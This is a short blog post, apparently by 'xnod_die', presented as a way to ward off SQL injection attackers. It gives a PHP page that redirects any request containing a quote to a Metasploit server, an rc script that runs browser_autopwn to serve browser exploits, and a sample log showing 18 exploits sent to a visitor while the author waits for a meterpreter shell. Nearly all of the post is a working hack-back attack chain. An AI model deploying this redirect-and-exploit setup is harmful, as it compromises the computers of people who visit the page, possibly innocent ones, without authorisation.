Hello all ... This time I want to share, how to ward off an attack on a web sqli,, using metasploit,,,,
Most of the attacker was using windows,,,,
well this is an opportunity for us to counterattack ...
immediately wrote nh,,, sorry if repost ....
create a script index.php
CODE :
$_GET['xnod'])) {header('Location: http://192.168.1.100:4444');}?><html><body>Silahkan dicoba<a href="?xnod=2">test 1</a> - <a href="?xnod=2">test 2</a>- <a href="?xnod=6">test 3</a></body></html>
ok now let me make the script easier gunain metasploit
you named antisqli.rc
Code:
# cat <<EOF> antisqli.rc> use auxiliary/server/browser_autopwn> set LHOST 192.168.100> set SRVPORT 4444> set URIPATH /> run> EOF
Well now we run it while waiting for the attacker metasploit attack,,, while drinking coffee and eating fried ..
./msfconsole -q -r antisqli.rc
Please wait until there is a log like this
Code:
192.168.1.5:1205 [302]: /?xnod=6%27
long wait finally there is also a hit ya ..
Code:
msf auxiliary(browser_autopwn) >[*] 192.168.1.5 browser_autopwn - Handling '/'[*] 192.168.1.5 browser_autopwn - Handling '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6MTIuMDo%3d'[*] 192.168.1.5 browser_autopwn - JavaScript Report: Microsoft Windows:7:undefined:en-US:x86:Firefox:12.0:[*] 192.168.1.5 browser_autopwn - Responding with 18 exploits
wait for meterpreter Showing,,, and then up to you
regards xnod_die
xnod_die
0 comments:
Post a Comment